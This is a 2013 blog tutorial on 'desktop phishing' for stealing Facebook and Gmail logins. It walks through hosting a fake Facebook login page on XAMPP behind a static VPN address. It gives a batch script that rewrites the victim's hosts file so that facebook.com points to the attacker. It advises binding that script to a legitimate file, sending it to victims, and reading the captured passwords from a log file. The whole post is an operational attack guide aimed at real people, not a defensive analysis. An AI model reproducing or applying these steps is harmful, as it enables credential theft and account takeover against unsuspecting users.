Saturday, July 20, 2013


Desktop Phishing is another advanced type of Phishing attack.In this article i will explain how you can use this method to hack Facebook book , Gmail accounts .

This phishing attack is a bit advanced and if your a newbie i would recommend you to read the following articles first



Desktop Phishing Tutorial  - Hack Facebook Accounts

Concept Behind The Hack :
Hosts file is a computer file used in an operating system to map host names to IP addresses. Host file used to play a large role before the Domain Name System (DNS) came into existence. A hosts file basically controls how your browser finds websites.

You can use host file to map any word or domain to an ip address or to another domain. For example if we add 
74.125.236.84  www.facebook.com

To the host file what will happen is that when you type Facebook.com  in your browser it will open google.com  instead of facebook.com  this is because  (74.125.236.84) is Google's Ip, So the browesr will take it blindly So if a attacker is abel to add his Ip  address (where he Hosts the phisher page ) Victim will be redirected to the attackers phishing site.

What makes this attack so successful is the victim will not Know since the URL only remains facebook.com

What Hackers Don't Teach You ?
I see many tutorials on the net on Desktop Phishing but Most of the tuts wont't  work because of following things
  • Now days every one has a dynamic IP address (ip changes every time when you restart  )
  • Now all most all computers are behind a Router, So we have to port forward our web server in order to access it . This is a little confusing for newbies 
But in  this tutorial  i will explain how you can over come all these problems


How To Over Come This Problem ?
 We can overcome the above problems by using a static VPN  , With a VPN you will have a static Ip address and you need not port forward your webserver


Demonstration
Things You Require :-

1. Phisher Page - You can download Facebook Phisher page from Here
(I've added an extra page to make it more realistic, the victim will get a message saying Facebook is blocked by your isp)

2. Web server - You can use wamp or xammp , i would recommend you to use xammp, i have written a tutorial on how you can  install , use Xammp kindly refer the article for more details


3. A static VPN - I will Use proXPN VPN for this Tutorial but i recommend you to use Strong Open VPN  as it is very stable you can download it from Here 

Procedure:-

1. First Download and install xampp on your PC, Start Apache and Msql services


2. Download the Facebook Phisher page From the link given above,  Place all its contents in the ht docs folder which should be under Xammp (place were you installed xampp)


3. Install ProXPN VPN or any other static VPN, i recommend you to use Strong Vpn as it very stable and gives you a static IP Once you install and run it, you will get a static IP (vpn)



4. Now we have to replace some text in the victims Host file which is at C:\windows\system32\drivers\etc ,You can do this by many ways either by using a SFX archive or using a batch file for this tutorial we will use a batch file to accomplish the job

@echo off
echo 172.X.XX.X.X   www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit

Replace  "172.X.XX.X.X" with your IP (vpn ) address, Finally save it as Save it as Something.bat

5. Now to avoid suspicion you can Bind the batch file with a legitimate file, Kindly refer the Binders tutorial for more info..

6. Now send the file via email or  upload the file to a site and ask the victim to download the file , After the victim downloads and clicks the file, his host file will be replaced ,So now when ever the victim enters facebook.com He will be redirected to our Phisher Page, But the URL will remain as Facebook.com




To see all the victims credentials and Password open newly created log.txt file which is under ht docs folder


Hope you liked the Tutorial ,For further Doubts and clarifications please pass your comments 

0 comments :

Post a Comment